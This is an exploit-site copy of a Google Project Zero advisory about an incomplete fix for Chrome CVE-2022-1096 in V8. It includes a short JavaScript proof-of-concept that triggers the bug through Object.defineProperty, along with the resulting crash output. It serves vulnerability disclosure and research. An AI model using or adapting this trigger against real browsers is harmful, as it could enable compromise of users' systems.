Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022060052

Below is a copy:

Chrome CVE-2022-1096 Incomplete Fix
Chrome: Incomplete fix for CVE-2022-1096

VULNERABILITY DETAILS
The fix for https://crbug.com/1309225 has modified `SetPropertyInternal()` to fall back to `SetSuperProperty()` whenever a property access interceptor is encountered because `SetSuperProperty()` is robust against possible side effects caused by interceptors.

Unfortunately, the function `JSObject::DefineOwnPropertyIgnoreAttributes()` is also affected by the bug and requires the same change.


VERSION
Google Chrome 100.0.4896.60 (Official Build) (arm64)
Chromium 102.0.4972.0 (Developer Build) (64-bit)


REPRODUCTION CASE
To make the exploit functional again, the attacker only needs to replace one property store with an `Object.defineProperty()` call:

```
<script>
style = document.createElement('p').style;
Object.defineProperty(style, 'prop', {
  value: { toString() { style.prop = 1 } }
});
</script>
```

The repro case above triggers the same DCHECK failure:

```
#
# Fatal error in ../../v8/src/objects/map.cc, line 437
# Debug check failed: map->instance_descriptors(isolate) .Search(*name, map->NumberOfOwnDescriptors()) .is_not_found().
#
```

CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2022-06-28.


Related CVE Numbers: CVE-2022-1232,CVE-2022-1096.



Found by: [email protected]

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.